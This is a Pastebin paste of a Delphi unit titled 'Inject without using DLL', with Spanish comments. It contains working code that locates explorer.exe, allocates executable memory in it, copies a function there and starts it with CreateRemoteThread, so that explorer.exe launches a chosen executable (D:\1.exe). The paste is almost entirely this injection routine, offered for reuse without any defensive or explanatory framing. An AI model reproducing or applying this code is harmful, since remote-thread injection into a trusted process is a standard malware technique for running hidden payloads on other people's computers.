API tools faq
paste
Advertisement
appo

Inject without using DLL

appo
Dec 27th, 2013
622
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Delphi 4.57 KB | None | 0 0
raw download clone embed print report
  1.  //******************************************************************************
  2. //* UNIT:        UNT_InjectNoDLL
  3. //* AUTOR:        Fakedo0r
  4. //******************************************************************************
  5. Unit UNT_InjectNoDLL;
  6. //******************************************************************************
  7. //DECLARACION DE LIBRERIAS / CLASES
  8. //******************************************************************************
  9. Interface
  10.  
  11. Uses
  12.   Winapi.Windows, TLHelp32, PsAPI, ShellAPI;
  13. //******************************************************************************
  14. //DECLARACION DE ESTRUCTURAS
  15. //******************************************************************************
  16. Type
  17.   PTINJECT = ^TINJECT;
  18.  
  19.   TINJECT = Record
  20.     __ShellExecute: Function(HWND: HWND; Operation, FileName, Parameters,
  21.       Directory: PWideChar; ShowCmd: Integer): HINST; Stdcall;
  22.  
  23.     cExe: Array [0 .. MAX_PATH] Of Char;
  24.     cOper: Array [0 .. MAX_PATH] Of Char;
  25.   End;
  26. //******************************************************************************
  27. //DECLARACION DE FUNCIONES / PROCEDIMIENTOS
  28. //******************************************************************************
  29. Procedure Inyectada(tInj: PTINJECT); Stdcall;
  30. Procedure Inyectora;
  31. Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
  32.   iBuffSize: Int64): Pointer;
  33. //******************************************************************************
  34. Implementation
  35. //******************************************************************************
  36. //<--- LA FUNCION QUE VAMOS A INYECTAR --->
  37. //******************************************************************************
  38. Procedure Inyectada(tInj: PTINJECT); Stdcall;
  39. Begin
  40.   tInj.__ShellExecute(0, tInj.cOper, tInj.cExe, Nil, Nil, 1);
  41. End;
  42. //******************************************************************************
  43. //<--- LA FUNCION QUE OPERA LA INYECCION --->
  44. //******************************************************************************
  45. Procedure Inyectora;
  46. Var
  47.   uTamFun:    UINT;
  48.   dwPID:      DWORD;
  49.   dwExitCode: DWORD;
  50.   hThread:    THandle;
  51.   hProcess:  THandle;
  52.   ptStruct:  Pointer;
  53.   ptEsp:      Pointer;
  54.   tProcEntry: TProcessEntry32;
  55.   tInj:      TINJECT;
  56. Begin
  57.   uTamFun := 0;
  58.   dwExitCode := 0;
  59.   hProcess := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  60.   tProcEntry.dwSize := Sizeof(tProcEntry);
  61.  
  62.   If Process32First(hProcess, tProcEntry) Then
  63.   Begin
  64.     Repeat
  65.       If tProcEntry.szExeFile = 'explorer.exe' Then
  66.       Begin
  67.         dwPID := tProcEntry.th32ProcessID;
  68.         Break;
  69.       End;
  70.     Until Not Process32Next(hProcess, tProcEntry);
  71.   End;
  72.  
  73.   CloseHandle(hProcess);
  74.  
  75.   // obtenemos el handle del proceso
  76.   hProcess := OpenProcess(PROCESS_ALL_ACCESS, False, dwPID);
  77.  
  78.   // obtenemos el puntero del api
  79.   @tInj.__ShellExecute := GetProcAddress(LoadLibrary('Shell32.dll'),
  80.     'ShellExecuteW');
  81.  
  82.   // copiamos los datos en las variables
  83.   lstrcpy(tInj.cExe, PChar('D:\1.exe'));
  84.   lstrcpy(tInj.cOper, PChar('open'));
  85.  
  86.   // reservamos y copiamos nuestra estructura a la memoria
  87.   ptStruct := AllocAndCopyMem(hProcess, @tInj, Sizeof(TINJECT));
  88.  
  89.   // calculamos el tamaño de nuestra funcion
  90.   uTamFun := UINT(@Inyectora) - UINT(@Inyectada);
  91.  
  92.   // reservamos y copiamos nuestra funcion a la memoria
  93.   ptEsp := AllocAndCopyMem(hProcess, @Inyectada, uTamFun);
  94.  
  95.   // creamos el hilo remoto
  96.   hThread := CreateRemoteThread(hProcess, Nil, 0, ptEsp, ptStruct, 0,
  97.     PDWORD(Nil)^);
  98.  
  99.   If hThread <> 0 Then
  100.   Begin
  101.     // esperamos hasta que se cree el hilo
  102.     WaitForSingleObject(hThread, INFINITE);
  103.     // obtenemos el estado de terminacion del hilo
  104.     GetExitCodeThread(hThread, dwExitCode);
  105.     // liberamos el handle del hilo creado
  106.     CloseHandle(hThread);
  107.     // liberamos el espacio en el proceso
  108.     VirtualFreeEx(hProcess, ptStruct, 0, MEM_RELEASE);
  109.     VirtualFreeEx(hProcess, ptEsp, 0, MEM_RELEASE);
  110.   End;
  111.  
  112.   // liberamos el handle del proceso
  113.   CloseHandle(hProcess);
  114. End;
  115. //******************************************************************************
  116. //<--- RESERVA ESPACIO Y ESCRIBE EN LA MEMORIA --->
  117. //******************************************************************************
  118. Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
  119.   iBuffSize: Int64): Pointer;
  120. Var
  121.   iBytesWritten: SIZE_T;
  122. Begin
  123.   iBytesWritten := 0;
  124.   // reservamos espacio
  125.   Result := VirtualAllocEx(hProcess, Nil, iBuffSize, MEM_COMMIT Or MEM_RESERVE,
  126.     PAGE_EXECUTE_READWRITE);
  127.   // escribimos
  128.   WriteProcessMemory(hProcess, Result, ptBuffer, iBuffSize, iBytesWritten);
  129. End;
  130. End.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!